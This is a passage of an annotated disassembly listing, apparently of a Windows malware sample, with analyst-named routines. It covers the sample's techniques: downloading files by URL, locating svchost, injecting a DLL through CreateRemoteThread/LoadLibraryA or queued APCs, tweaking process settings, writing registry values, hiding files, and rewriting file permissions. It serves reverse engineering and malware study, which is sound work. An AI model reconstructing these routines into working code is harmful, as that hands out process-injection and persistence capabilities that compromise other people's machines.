loc_9ACABC: ; CODE XREF: sub_9AC9D5+D7�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AC9D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_download_file_from_URL(LPCSTR lpszUrl,int,int)
sub_download_file_from_URL proc near ; CODE XREF: sub_download_file_from_url+F�p
; sub_download_and_check_my_IP+5E�p ...
szAgent = byte ptr -420h
var_20 = dword ptr -20h
dwIndex = dword ptr -1Ch
hInternet = dword ptr -18h
Buffer = dword ptr -14h
hFile = dword ptr -10h
dwNumberOfBytesRead= dword ptr -0Ch
dwBufferLength = dword ptr -8
var_4 = dword ptr -4
lpszUrl = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 420h
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push ebx
push esi
push edi
lea eax, [ebp+dwBufferLength]
push eax ; cbSize
lea eax, [ebp+szAgent]
push eax ; pszUAOut
push 0 ; dwOption
mov [ebp+dwBufferLength], 400h
call ObtainUserAgentString
mov esi, 10000h
push esi ; dwBytes
push 40h ; uFlags
mov ebx, esi
call ds:GlobalAlloc
mov edi, eax
xor eax, eax
cmp edi, eax
jz loc_9ACC03
xor ecx, ecx
cmp [ebp+arg_8], eax
push eax ; dwFlags
setnz cl
push eax ; lpszProxyBypass
push eax ; lpszProxy
lea eax, [ebp+szAgent]
push ecx ; dwAccessType
push eax ; lpszAgent
call ds:InternetOpenA
test eax, eax
mov [ebp+hInternet], eax
jz loc_9ACC03
xor eax, eax
push eax ; dwContext
push 84080300h ; dwFlags
push eax ; dwHeadersLength
push eax ; lpszHeaders
push [ebp+lpszUrl] ; lpszUrl
push [ebp+hInternet] ; hInternet
call ds:InternetOpenUrlA
test eax, eax
mov [ebp+hFile], eax
jz loc_9ACBFA
and [ebp+dwIndex], 0
lea ecx, [ebp+dwIndex]
push ecx ; lpdwIndex
lea ecx, [ebp+dwBufferLength]
push ecx ; lpdwBufferLength
lea ecx, [ebp+Buffer]
push ecx ; lpBuffer
push 20000013h ; dwInfoLevel
push eax ; hRequest
mov [ebp+Buffer], 1F4h
mov [ebp+dwBufferLength], 4
call ds:HttpQueryInfoA
test eax, eax
jz short loc_9ACBF1
cmp [ebp+Buffer], 0C8h
jnz short loc_9ACBF1
and [ebp+dwNumberOfBytesRead], 0
and [ebp+var_4], 0
lea eax, [ebp+dwNumberOfBytesRead]
push eax
push esi
push edi
jmp short loc_9ACBDC
; ---------------------------------------------------------------------------
loc_9ACB94: ; CODE XREF: sub_download_file_from_URL+126�j
mov eax, [ebp+dwNumberOfBytesRead]
test eax, eax
jz short loc_9ACBE9
add [ebp+var_4], eax
cmp [ebp+var_4], ebx
jnz short loc_9ACBCD
lea esi, [ebx+ebx]
push esi ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
test eax, eax
mov [ebp+var_20], eax
jz short loc_9ACBE9
push ebx ; Size
push edi ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
push edi ; hMem
call ds:GlobalFree
mov edi, [ebp+var_20]
mov ebx, esi
loc_9ACBCD: ; CODE XREF: sub_download_file_from_URL+E0�j
lea eax, [ebp+dwNumberOfBytesRead]
push eax ; lpdwNumberOfBytesRead
mov eax, [ebp+var_4]
mov ecx, ebx
sub ecx, eax
push ecx ; dwNumberOfBytesToRead
add eax, edi
push eax ; lpBuffer
loc_9ACBDC: ; CODE XREF: sub_download_file_from_URL+D1�j
push [ebp+hFile] ; hFile
call ds:InternetReadFile
test eax, eax
jnz short loc_9ACB94
loc_9ACBE9: ; CODE XREF: sub_download_file_from_URL+D8�j
; sub_download_file_from_URL+F3�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [ecx], eax
loc_9ACBF1: ; CODE XREF: sub_download_file_from_URL+B8�j
; sub_download_file_from_URL+C1�j
push [ebp+hFile] ; hInternet
call ds:InternetCloseHandle
loc_9ACBFA: ; CODE XREF: sub_download_file_from_URL+86�j
push [ebp+hInternet] ; hInternet
call ds:InternetCloseHandle
loc_9ACC03: ; CODE XREF: sub_download_file_from_URL+41�j
; sub_download_file_from_URL+65�j
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_9ACC18
test edi, edi
jz short loc_9ACC18
push edi ; hMem
call ds:GlobalFree
xor edi, edi
loc_9ACC18: ; CODE XREF: sub_download_file_from_URL+148�j
; sub_download_file_from_URL+14C�j
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_download_file_from_URL endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_find_process_handle_by_name(char *Str2)
sub_find_process_handle_by_name proc near ; CODE XREF: sub_9A74E1+2A�p
; sub_9AB59B+8�p ...
Str1 = PROCESSENTRY32 ptr -128h
Str2 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
push esi
xor ebx, ebx
push ebx ; th32ProcessID
push 2 ; dwFlags
call CreateToolhelp32Snapshot
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9ACC99
push edi
push 49h
pop ecx
xor eax, eax
mov [ebp+Str1.dwSize], 128h
lea edi, [ebp+Str1.cntUsage]
rep stosd
lea eax, [ebp+Str1]
push eax ; lppe
push esi ; hSnapshot
call Process32First
pop edi
jmp short loc_9ACC86
; ---------------------------------------------------------------------------
loc_9ACC63: ; CODE XREF: sub_find_process_handle_by_name+69�j
push [ebp+Str2] ; Str2
lea eax, [ebp+Str1.szExeFile]
push eax ; Str1
call ds:_strcmpi
test eax, eax
pop ecx
pop ecx
jz short loc_9ACC8C
lea eax, [ebp+Str1]
push eax ; lppe
push esi ; hSnapshot
call Process32Next
loc_9ACC86: ; CODE XREF: sub_find_process_handle_by_name+42�j
test eax, eax
jnz short loc_9ACC63
jmp short loc_9ACC92
; ---------------------------------------------------------------------------
loc_9ACC8C: ; CODE XREF: sub_find_process_handle_by_name+58�j
mov ebx, [ebp+Str1.th32ProcessID]
loc_9ACC92: ; CODE XREF: sub_find_process_handle_by_name+6B�j
push esi ; hObject
call ds:CloseHandle
loc_9ACC99: ; CODE XREF: sub_find_process_handle_by_name+1A�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_find_process_handle_by_name endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_CreateRemoteThreasandwriteProcessMemory(DWORD dwProcessId,char *lpBuffer)
sub_CreateRemoteThreasandwriteProcessMemory proc near ; CODE XREF: sub_9A74E1+1A�p
; sub_9A74E1+36�p ...
te = THREADENTRY32 ptr -3Ch
ThreadId = dword ptr -20h
NumberOfBytesWritten= dword ptr -1Ch
var_18 = dword ptr -18h
hProcess = dword ptr -14h
hObject = dword ptr -10h
lpStartAddress = dword ptr -0Ch
lpParameter = dword ptr -8
var_4 = dword ptr -4
dwProcessId = dword ptr 8
lpBuffer = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
push esi
push edi
push [ebp+lpBuffer] ; Str
xor edi, edi
mov [ebp+var_4], edi
call strlen
pop ecx
push [ebp+dwProcessId] ; dwProcessId
mov esi, eax
push edi ; bInheritHandle
push 2Ah ; dwDesiredAccess
inc esi
call ds:OpenProcess
cmp eax, edi
mov [ebp+hProcess], eax
jz loc_9ACE34
push 40h ; flProtect
push 3000h ; flAllocationType
lea ecx, [esi+20h]
push ecx ; dwSize
push edi ; lpAddress
push eax ; hProcess
call ds:VirtualAllocEx
cmp eax, edi
mov [ebp+lpParameter], eax
jz loc_9ACE1A
mov edi, ds:GetModuleHandleA
push ebx
push offset ProcName ; "LoadLibraryA"
push offset aKernel32_dll ; "kernel32.dll"
call edi ; GetModuleHandleA
mov ebx, ds:GetProcAddress
push eax ; hModule
call ebx ; GetProcAddress
mov [ebp+lpStartAddress], eax
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
inc esi
push esi ; nSize
push [ebp+lpBuffer] ; lpBuffer
push [ebp+lpParameter] ; lpBaseAddress
push [ebp+hProcess] ; hProcess
call ds:WriteProcessMemory
test eax, eax
jz loc_9ACE19
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
xor esi, esi
push esi ; dwCreationFlags
push [ebp+lpParameter] ; lpParameter
push [ebp+lpStartAddress] ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
push [ebp+hProcess] ; hProcess
call ds:CreateRemoteThread
cmp eax, esi
jz short loc_9ACD52
mov [ebp+var_4], 1
push eax
jmp loc_9ACE13
; ---------------------------------------------------------------------------
loc_9ACD52: ; CODE XREF: sub_CreateRemoteThreasandwriteProcessMemory+A4�j
push offset aNtqueueapcthre ; "NtQueueApcThread"
push offset aNtdll_dll ; "ntdll.dll"
call edi ; GetModuleHandleA
push eax ; hModule
call ebx ; GetProcAddress
cmp eax, esi
mov [ebp+var_18], eax
jz loc_9ACE19
push offset aLoadlibraryexa ; "LoadLibraryExA"
push offset aKernel32_dll ; "kernel32.dll"
call edi ; GetModuleHandleA
push eax ; hModule
call ebx ; GetProcAddress
push 0 ; th32ProcessID
push 4 ; dwFlags
mov [ebp+lpStartAddress], eax
call CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jz loc_9ACE19
push 6
pop ecx
xor eax, eax
lea edi, [ebp+te.cntUsage]
rep stosd
lea eax, [ebp+te]
push eax ; lpte
push [ebp+hObject] ; hSnapshot
mov [ebp+te.dwSize], 1Ch
call Thread32First
jmp short loc_9ACE0C
; ---------------------------------------------------------------------------
loc_9ACDB2: ; CODE XREF: sub_CreateRemoteThreasandwriteProcessMemory+16F�j
mov eax, [ebp+dwProcessId]
cmp eax, [ebp+te.th32OwnerProcessID]
jnz short loc_9ACE00
push [ebp+te.th32ThreadID] ; dwThreadId
xor esi, esi
push esi ; bInheritHandle
push 10h ; dwDesiredAccess
call ds:OpenThread
mov ebx, eax
cmp ebx, esi
jz short loc_9ACE00
push esi
push esi
push [ebp+lpParameter]
push [ebp+lpStartAddress]
push ebx
call [ebp+var_18]
push ebx ; hObject
mov edi, eax
call ds:CloseHandle
push edi
push [ebp+te.th32ThreadID]
push offset aThread08xStatu ; "thread: %08x, status: %08x\n"
call ds:printf
add esp, 0Ch
cmp edi, esi
jl short loc_9ACE00
mov [ebp+var_4], 1
loc_9ACE00: ; CODE XREF: sub_CreateRemoteThreasandwriteProcessMemory+119�j
; sub_CreateRemoteThreasandwriteProcessMemory+12D�j ...
lea eax, [ebp+te]
push eax ; lpte
push [ebp+hObject] ; hSnapshot
call Thread32Next
loc_9ACE0C: ; CODE XREF: sub_CreateRemoteThreasandwriteProcessMemory+111�j
test eax, eax
jnz short loc_9ACDB2
push [ebp+hObject] ; hObject
loc_9ACE13: ; CODE XREF: sub_CreateRemoteThreasandwriteProcessMemory+AE�j
call ds:CloseHandle
loc_9ACE19: ; CODE XREF: sub_CreateRemoteThreasandwriteProcessMemory+84�j
; sub_CreateRemoteThreasandwriteProcessMemory+C7�j ...
pop ebx
loc_9ACE1A: ; CODE XREF: sub_CreateRemoteThreasandwriteProcessMemory+48�j
push [ebp+hProcess] ; hObject
call ds:CloseHandle
cmp [ebp+var_4], 0
jz short loc_9ACE34
push 5DCh ; dwMilliseconds
call ds:Sleep
loc_9ACE34: ; CODE XREF: sub_CreateRemoteThreasandwriteProcessMemory+2A�j
; sub_CreateRemoteThreasandwriteProcessMemory+188�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_CreateRemoteThreasandwriteProcessMemory endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_9ACE3B proc near ; CODE XREF: sub_9ACEC5+61�p
Buffer = byte ptr -8Ch
var_7C = dword ptr -7Ch
Src = byte ptr -4Ch
Dst = word ptr -0Ch
var_8 = dword ptr -8
NumberOfBytesRead= dword ptr -4
hProcess = dword ptr 8
lpBaseAddress = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 8Ch
push esi
mov esi, ds:ReadProcessMemory
push edi
lea eax, [ebp+6Ch+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
mov edi, 80h
push edi ; nSize
lea eax, [ebp+6Ch+Buffer]
push eax ; lpBuffer
push [ebp+6Ch+lpBaseAddress] ; lpBaseAddress
push [ebp+6Ch+hProcess] ; hProcess
call esi ; ReadProcessMemory
test eax, eax
jnz short loc_9ACE6C
loc_9ACE68: ; CODE XREF: sub_9ACE3B+44�j
; sub_9ACE3B+64�j
xor eax, eax
jmp short loc_9ACEBE
; ---------------------------------------------------------------------------
loc_9ACE6C: ; CODE XREF: sub_9ACE3B+2B�j
lea eax, [ebp+6Ch+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push edi ; nSize
lea eax, [ebp+6Ch+Buffer]
push eax ; lpBuffer
push [ebp+6Ch+var_7C] ; lpBaseAddress
push [ebp+6Ch+hProcess] ; hProcess
call esi ; ReadProcessMemory
test eax, eax
jz short loc_9ACE68
push 8 ; Size
lea eax, [ebp+6Ch+Src]
push eax ; Src
lea eax, [ebp+6Ch+Dst]
push eax ; Dst
call memcpy
movzx eax, [ebp+6Ch+Dst]
mov ecx, [ebp+6Ch+arg_8]
add esp, 0Ch
shr eax, 1
dec ecx
cmp ecx, eax
jb short loc_9ACE68
and word ptr [ebx+eax*2], 0
lea eax, [ebp+6Ch+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
movzx eax, [ebp+6Ch+Dst]
push eax ; nSize
push ebx ; lpBuffer
push [ebp+6Ch+var_8] ; lpBaseAddress
push [ebp+6Ch+hProcess] ; hProcess
call esi ; ReadProcessMemory
neg eax
sbb eax, eax
neg eax
loc_9ACEBE: ; CODE XREF: sub_9ACE3B+2F�j
pop edi
pop esi
add ebp, 6Ch
leave
retn
sub_9ACE3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ACEC5(DWORD dwProcessId,int,int)
sub_9ACEC5 proc near ; CODE XREF: sub_find_svchost_process_id+71�p
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_4 = byte ptr -4
dwProcessId = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push offset aNtqueryinforma ; "NtQueryInformationProcess"
push offset aNtdll_dll ; "ntdll.dll"
call ds:GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress
mov ebx, eax
xor edi, edi
cmp ebx, edi
jnz short loc_9ACEF0
xor eax, eax
jmp short loc_9ACF3A
; ---------------------------------------------------------------------------
loc_9ACEF0: ; CODE XREF: sub_9ACEC5+25�j
push esi
push [ebp+dwProcessId] ; dwProcessId
push edi ; bInheritHandle
push 410h ; dwDesiredAccess
call ds:OpenProcess
mov esi, eax
cmp esi, edi
jnz short loc_9ACF0A
xor eax, eax
jmp short loc_9ACF39
; ---------------------------------------------------------------------------
loc_9ACF0A: ; CODE XREF: sub_9ACEC5+3F�j
lea eax, [ebp+var_4]
push eax
push 18h
lea eax, [ebp+var_1C]
push eax
push edi
push esi
call ebx
test eax, eax
jl short loc_9ACF30
push [ebp+arg_8]
mov ebx, [ebp+arg_4]
push [ebp+var_18]
push esi
call sub_9ACE3B
add esp, 0Ch
mov edi, eax
loc_9ACF30: ; CODE XREF: sub_9ACEC5+55�j
push esi ; hObject
call ds:CloseHandle
mov eax, edi
loc_9ACF39: ; CODE XREF: sub_9ACEC5+43�j
pop esi
loc_9ACF3A: ; CODE XREF: sub_9ACEC5+29�j
pop edi
pop ebx
leave
retn
sub_9ACEC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_find_svchost_process_id(LPCWSTR lpSrch)
sub_find_svchost_process_id proc near ; CODE XREF: sub_9A74E1+9�p
; sub_find_svchost_and_attach+8�p
First = word ptr -330h
var_32E = byte ptr -32Eh
dwProcessId = PROCESSENTRY32 ptr -128h
lpSrch = dword ptr 8
push ebp
mov ebp, esp
sub esp, 330h
push ebx
push esi
xor ebx, ebx
push ebx ; th32ProcessID
push 2 ; dwFlags
call CreateToolhelp32Snapshot
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_9ACFF0
push edi
push 49h
pop ecx
xor eax, eax
mov [ebp+dwProcessId.dwSize], 128h
lea edi, [ebp+dwProcessId.cntUsage]
rep stosd
lea eax, [ebp+dwProcessId]
push eax ; lppe
push esi ; hSnapshot
call Process32First
jmp short loc_9ACFDC
; ---------------------------------------------------------------------------
loc_9ACF85: ; CODE XREF: sub_find_svchost_process_id+A0�j
xor eax, eax
mov [ebp+First], bx
mov ecx, 81h
lea edi, [ebp+var_32E]
rep stosd
stosw
push 104h ; int
lea eax, [ebp+First]
push eax ; int
push [ebp+dwProcessId.th32ProcessID] ; dwProcessId
call sub_9ACEC5
add esp, 0Ch
test eax, eax
jz short loc_9ACFCF
push [ebp+lpSrch] ; lpSrch
lea eax, [ebp+First]
push eax ; lpFirst
call ds:StrStrIW
test eax, eax
jnz short loc_9ACFE2
loc_9ACFCF: ; CODE XREF: sub_find_svchost_process_id+7B�j
lea eax, [ebp+dwProcessId]
push eax ; lppe
push esi ; hSnapshot
call Process32Next
loc_9ACFDC: ; CODE XREF: sub_find_svchost_process_id+45�j
test eax, eax
jnz short loc_9ACF85
jmp short loc_9ACFE8
; ---------------------------------------------------------------------------
loc_9ACFE2: ; CODE XREF: sub_find_svchost_process_id+8F�j
mov ebx, [ebp+dwProcessId.th32ProcessID]
loc_9ACFE8: ; CODE XREF: sub_find_svchost_process_id+A2�j
push esi ; hObject
call ds:CloseHandle
pop edi
loc_9ACFF0: ; CODE XREF: sub_find_svchost_process_id+1A�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_find_svchost_process_id endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ACFF6 proc near ; CODE XREF: sub_main+24�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, ds:GetModuleHandleA
push edi
push offset aNtqueryinforma ; "NtQueryInformationProcess"
mov ebx, offset aNtdll_dll ; "ntdll.dll"
push ebx ; lpModuleName
call esi ; GetModuleHandleA
mov edi, ds:GetProcAddress
push eax ; hModule
call edi ; GetProcAddress
push offset aNtsetinformati ; "NtSetInformationProcess"
push ebx ; lpModuleName
mov [ebp+var_8], eax
call esi ; GetModuleHandleA
push eax ; hModule
call edi ; GetProcAddress
mov esi, eax
xor eax, eax
cmp [ebp+var_8], eax
jz short loc_9AD05A
cmp esi, eax
jz short loc_9AD05A
push eax
push 4
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push 22h
push 0FFFFFFFFh
call [ebp+var_8]
test eax, eax
jl short loc_9AD05A
or [ebp+var_4], 70h
push 4
lea eax, [ebp+var_4]
push eax
push 22h
push 0FFFFFFFFh
call esi
loc_9AD05A: ; CODE XREF: sub_9ACFF6+39�j
; sub_9ACFF6+3D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_9ACFF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD05F(HKEY hKey,LPCSTR lpSubKey,LPCSTR lpValueName,BYTE *lpData,DWORD cbData,DWORD dwType)
sub_9AD05F proc near ; CODE XREF: sub_9AD0F4+15�p
phkResult = dword ptr -4
hKey = dword ptr 8
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
lpData = dword ptr 14h
cbData = dword ptr 18h
dwType = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push esi
lea eax, [ebp+phkResult]
push eax ; phkResult
push 20006h ; samDesired
xor esi, esi
push esi ; ulOptions
push [ebp+lpSubKey] ; lpSubKey
push [ebp+hKey] ; hKey
call ds:RegOpenKeyExA
test eax, eax
jnz short loc_9AD0A4
push [ebp+cbData] ; cbData
push [ebp+lpData] ; lpData
push [ebp+dwType] ; dwType
push esi ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call ds:RegSetValueExA
test eax, eax
jnz short loc_9AD09B
inc esi
loc_9AD09B: ; CODE XREF: sub_9AD05F+39�j
push [ebp+phkResult] ; hKey
call ds:RegCloseKey
loc_9AD0A4: ; CODE XREF: sub_9AD05F+1F�j
mov eax, esi
pop esi
leave
retn
sub_9AD05F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD0A9(int,LPCSTR lpSubKey,LPCSTR lpValueName,LPBYTE lpData,DWORD cbData)
sub_9AD0A9 proc near ; CODE XREF: sub_9AD112+12�p
hKey = dword ptr -4
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
lpData = dword ptr 14h
cbData = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push esi
lea eax, [ebp+hKey]
push eax ; phkResult
push 20019h ; samDesired
xor esi, esi
push esi ; ulOptions
push [ebp+lpSubKey] ; lpSubKey
push 80000002h ; hKey
call ds:RegOpenKeyExA
test eax, eax
jnz short loc_9AD0EF
lea eax, [ebp+cbData]
push eax ; lpcbData
push [ebp+lpData] ; lpData
push esi ; lpType
push esi ; lpReserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
call ds:RegQueryValueExA
test eax, eax
jnz short loc_9AD0E6
inc esi
loc_9AD0E6: ; CODE XREF: sub_9AD0A9+3A�j
push [ebp+hKey] ; hKey
call ds:RegCloseKey
loc_9AD0EF: ; CODE XREF: sub_9AD0A9+21�j
mov eax, esi
pop esi
leave
retn
sub_9AD0A9 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AD0F4(HKEY hKey,LPCSTR lpSubKey,LPCSTR lpValueName,BYTE Data)
sub_9AD0F4 proc near ; CODE XREF: sub_9A7170+82�p
; sub_9A91B5+17�p ...
hKey = dword ptr 4
lpSubKey = dword ptr 8
lpValueName = dword ptr 0Ch
Data = byte ptr 10h
push 4 ; dwType
push 4 ; cbData
lea eax, [esp+8+Data]
push eax ; lpData
push [esp+0Ch+lpValueName] ; lpValueName
push [esp+10h+lpSubKey] ; lpSubKey
push [esp+14h+hKey] ; hKey
call sub_9AD05F
add esp, 18h
retn
sub_9AD0F4 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AD112(int,LPCSTR lpSubKey,LPCSTR lpValueName,LPBYTE lpData)
sub_9AD112 proc near ; CODE XREF: sub_9A7170+5F�p
; sub_9A91E7+24�p ...
arg_0 = dword ptr 4
lpSubKey = dword ptr 8
lpValueName = dword ptr 0Ch
lpData = dword ptr 10h
push 4 ; cbData
push [esp+4+lpData] ; lpData
push [esp+8+lpValueName] ; lpValueName
push [esp+0Ch+lpSubKey] ; lpSubKey
push [esp+10h+arg_0] ; int
call sub_9AD0A9
add esp, 14h
retn
sub_9AD112 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AD12D(LPCSTR lpFileName,int)
sub_9AD12D proc near ; CODE XREF: sub_9ABB9F+32E�p
; sub_9AD15E+2E�p ...
lpFileName = dword ptr 4
arg_4 = dword ptr 8
push [esp+lpFileName] ; lpFileName
call ds:GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short locret_9AD15D
cmp [esp+arg_4], 0
jz short loc_9AD14D
test al, 1
jz short locret_9AD15D
and eax, 26h
push eax
jmp short loc_9AD153
; ---------------------------------------------------------------------------
loc_9AD14D: ; CODE XREF: sub_9AD12D+14�j
test al, 1
jnz short locret_9AD15D
push 7 ; dwFileAttributes
loc_9AD153: ; CODE XREF: sub_9AD12D+1E�j
push [esp+4+lpFileName] ; lpFileName
call ds:SetFileAttributesA
locret_9AD15D: ; CODE XREF: sub_9AD12D+D�j
; sub_9AD12D+18�j ...
retn
sub_9AD12D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD15E(LPCSTR lpFileName,int)
sub_9AD15E proc near ; CODE XREF: sub_run_dll+6B�p
; sub_call_run_dll+26�p ...
pSecurityDescriptor= byte ptr -44h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -30h
nAclLength = dword ptr -28h
var_24 = dword ptr -24h
pSid = dword ptr -20h
hMem = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpFileName = dword ptr 8
arg_4 = dword ptr 0Ch
push 34h
push offset stru_9A4450
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_24], ebx
mov [ebp+hMem], ebx
mov [ebp+pSid], ebx
mov [ebp+ms_exc.disabled], ebx
mov edi, [ebp+arg_4]
mov eax, edi
mov esi, 120116h
and eax, esi
cmp eax, esi
jz short loc_9AD193
push ebx ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AD12D
pop ecx
pop ecx
loc_9AD193: ; CODE XREF: sub_9AD15E+28�j
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 1
push 1 ; dwRevision
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call ds:InitializeSecurityDescriptor
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push ebx ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call ds:AllocateAndInitializeSid
push [ebp+pSid] ; pSid
call ds:GetLengthSid
add eax, 10h
mov [ebp+nAclLength], eax
push eax ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov [ebp+hMem], eax
cmp eax, ebx
jz short loc_9AD241
or edi, 100000h
mov [ebp+arg_4], edi
push 2 ; dwAclRevision
push [ebp+nAclLength] ; nAclLength
push eax ; pAcl
call ds:InitializeAcl
push [ebp+pSid] ; pSid
push edi ; AccessMask
push 2 ; dwAceRevision
push [ebp+hMem] ; pAcl
call ds:AddAccessAllowedAce
push ebx ; bDaclDefaulted
push [ebp+hMem] ; pDacl
push 1 ; bDaclPresent
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call ds:SetSecurityDescriptorDacl
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
push 4 ; SecurityInformation
push [ebp+lpFileName] ; lpFileName
call ds:SetFileSecurityA
mov [ebp+var_24], eax
and edi, esi
cmp edi, esi
jnz short loc_9AD241
push 1 ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AD12D
pop ecx
pop ecx
loc_9AD241: ; CODE XREF: sub_9AD15E+89�j
; sub_9AD15E+D5�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AD254
; ---------------------------------------------------------------------------
loc_9AD247: ; DATA XREF: .text:stru_9A4450�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AD24B: ; DATA XREF: .text:stru_9A4450�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor ebx, ebx
loc_9AD254: ; CODE XREF: sub_9AD15E+E7�j
cmp [ebp+hMem], ebx
jz short loc_9AD262
push [ebp+hMem] ; hMem
call ds:GlobalFree
loc_9AD262: ; CODE XREF: sub_9AD15E+F9�j
cmp [ebp+pSid], ebx
jz short loc_9AD270
push [ebp+pSid] ; pSid
call ds:FreeSid
loc_9AD270: ; CODE XREF: sub_9AD15E+107�j
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_9AD15E endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AD279(int,char *Str)
sub_9AD279 proc near ; CODE XREF: sub_9A722A+31�p
arg_0 = dword ptr 4
Str = dword ptr 8
push esi
push [esp+4+arg_0]
mov esi, [esp+8+Str]
push esi
call _mbscpy
push 5Ch ; Ch
push esi ; Str
call ds:strrchr
add esp, 10h
test eax, eax
jz short loc_9AD29D
mov byte ptr [eax], 0
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AD29D: ; CODE XREF: sub_9AD279+1D�j
push esi ; lpBuffer
push 104h ; nBufferLength
call ds:GetCurrentDirectoryA
push esi ; Str
call strlen
cmp byte ptr [eax+esi-1], 5Ch
pop ecx
jnz short loc_9AD2C3
push esi ; Str
call strlen
pop ecx
mov byte ptr [eax+esi-1], 0
loc_9AD2C3: ; CODE XREF: sub_9AD279+3C�j
pop esi
retn
sub_9AD279 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AD2C5(char *Str,int,int)
sub_9AD2C5 proc near ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+F3�p
; sub_local_http_server_thread+60�p
Str = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+Str] ; Str
call strlen
pop ecx
mov ecx, [esp+arg_8]
dec ecx
cmp eax, ecx
jbe short loc_9AD2DB
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_9AD2DB: ; CODE XREF: sub_9AD2C5+11�j
test eax, eax
mov ecx, [esp+arg_4]
mov byte ptr [eax+ecx], 0
jbe short loc_9AD30E
mov edx, [esp+Str]
push esi
sub edx, ecx
mov esi, eax
loc_9AD2F0: ; CODE XREF: sub_9AD2C5+46�j
mov al, [edx+ecx]
cmp al, 7Ah
jnz short loc_9AD2FC
mov byte ptr [ecx], 61h
jmp short loc_9AD309
; ---------------------------------------------------------------------------
